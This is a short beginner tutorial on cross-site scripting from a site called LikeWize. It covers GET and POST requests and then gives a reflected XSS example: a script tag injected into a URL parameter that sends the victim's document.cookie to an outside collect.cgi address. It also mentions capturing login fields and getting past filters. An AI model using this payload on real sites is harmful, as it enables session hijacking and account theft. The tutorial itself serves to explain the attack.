:: LikeWize :: [XSS]

Cross-Site Scripting

What is it?

XSS (cross-site scripting) is a vulnerability within internet sites that allow attackers to inject script code. XSS can be a simple URL a victim needs to follow, or can be done through a simple POST request (usually done by having the victim visit an HTML page which the attacker has crafted). One example of XSS being exploited is the MySpace Samy Worm.

POST and GET Requests

Web sites commonly use POST and GET to send and recieve user data (these are HTTP request methods). When you hit the submit button on your shopping cart in an online store, you send a POST request. One way to see how this occurs is to download and experience Fiddler for Internet Explorer, or Tamper Data for Firefox. I would recommend you start learning with Tamper Data, though.

Request Example

Suppose my site had a script called hi.cgi which greeted you when you loaded it up. Well anyhow, the GET request for it would look like this:

GET /hi.cgi?name=Anubis HTTP/1.0

My server would generate the following HTML based on this script:

<html>
<head>:: LikeWize :: [Welcome Script]</head>
<body>Greetings, Anubis.</body>
</html>

If I was an attacker and wanted to steal cookies from you, I could find a way to make your browser have the following GET request:

GET /welcome.cgi?name=<script>window.open("http://www.likewize.net/collect.cgi?cookie
=" + document.cookie)</script>

Don't try the link because there is no collect.cgi on my server, LOL. Anyways, the server would substitute the JavaScript above into the name in the HTML:

<html>
<head>:: LikeWize :: [Welcome Script]</head>
<body>Greetings, <script>window.open("http://www.likewize.net/collect.cgi?cookie
=" + document.cookie)</script>.
</body>
</html>

The browser you use will then end up sending your cookies to me. But this doesn't even scrape the surface. JavaScript can do a whole lot more than just send over a few cookies for me to eat. It can perform a lot of different things; you can set up XSS to send an attacker the username and password fields of a login form. XSS can also be caused through user input of rich content, such as pictures or videos.

Summary

You need to first find a JavaScript vulnerability before exploiting. Some sites will try to filter special characters you try and use in JavaScript, but more often than not, there are ways around this.

Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my forum or to send me an e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.